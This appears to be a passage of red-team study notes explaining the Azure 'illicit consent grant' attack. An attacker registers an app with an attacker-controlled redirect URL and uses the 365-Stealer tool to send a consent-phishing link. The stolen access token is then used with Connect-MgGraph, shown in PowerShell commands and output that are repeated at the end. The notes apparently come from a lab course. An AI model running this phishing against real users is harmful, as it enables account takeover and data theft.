Illicit Consent Grant

When we have initial access to a user, we can create a application (this is a default setting).

A recommendation is to deny users to create applications

With this application we can ask another user to consent their permissions to our application. When the user consents, we get their access token. With this access token we can interact with perhaps the Graph API.

Attack

We first go to https://portal.azure.com and register a application from our initial access user. We should use a url that we own as redirect url. So for example https://172.16.150.60/login/authorized. For the permissions, we add User.ReadBasic.All:

Next, we spin up a tool called 365-stealer. Which is a tool created by Altered Security to give a GUI to manage our phishing attack. https://github.com/AlteredSecurity/365-Stealer. This tool allows us to fill in the app's information:

If we save and run the attack, a shell pops up with a phishing link:

We sent this link to the victim. If the victim consents to our application, we receive a update on the GUI:

We can copy the access_token and use that to connect to Microsoft Graph.

PS C:\Windows\system32> $token = 'eY.....'
PS C:\Windows\system32> Connect-MgGraph -AccessToken ($Token | ConvertTo-SecureString -AsPlainText -Force)
Welcome to Microsoft Graph!

Connected via userprovidedaccesstoken access using bd46fc07-1626-43be-80b7-fkfkfkf
Readme: https://aka.ms/graph/sdk/powershell
SDK Docs: https://aka.ms/graph/sdk/powershell/docs
API Docs: https://aka.ms/graph/docs

NOTE: You can use the -NoWelcome parameter to suppress this message.

PS C:\Windows\system32> Get-MgContext


ClientId               : bd46fc07-1626-43be-80b7fgfgfgfgff
TenantId               : 2d50cb29-5f7b-48a4-87ceffgffgfgfg
Scopes                 : {User.Read, User.ReadBasic.All, profile, openid...}
AuthType               : UserProvidedAccessToken
TokenCredentialType    : UserProvidedAccessToken
CertificateThumbprint  :
CertificateSubjectName :
SendCertificateChain   : False
Account                : x@pp.onmicrosoft.com
AppName                : student60
ContextScope           : Process
Certificate            :
PSHostVersion          : 5.1.17763.1490
ManagedIdentityId      :
ClientSecret           :
Environment            : Global

PreviousPrivilege Escalation NextMacro enabled Word-files (Revshell)

Last updated 4 days ago

PS C:\Windows\system32> $token = 'eY.....' PS C:\Windows\system32> Connect-MgGraph -AccessToken ($Token | ConvertTo-SecureString -AsPlainText -Force) Welcome to Microsoft Graph! Connected via userprovidedaccesstoken access using bd46fc07-1626-43be-80b7-fkfkfkf Readme: https://aka.ms/graph/sdk/powershell SDK Docs: https://aka.ms/graph/sdk/powershell/docs API Docs: https://aka.ms/graph/docs NOTE: You can use the -NoWelcome parameter to suppress this message. PS C:\Windows\system32> Get-MgContext ClientId : bd46fc07-1626-43be-80b7fgfgfgfgff TenantId : 2d50cb29-5f7b-48a4-87ceffgffgfgfg Scopes : {User.Read, User.ReadBasic.All, profile, openid...} AuthType : UserProvidedAccessToken TokenCredentialType : UserProvidedAccessToken CertificateThumbprint : CertificateSubjectName : SendCertificateChain : False Account : x@pp.onmicrosoft.com AppName : student60 ContextScope : Process Certificate : PSHostVersion : 5.1.17763.1490 ManagedIdentityId : ClientSecret : Environment : Global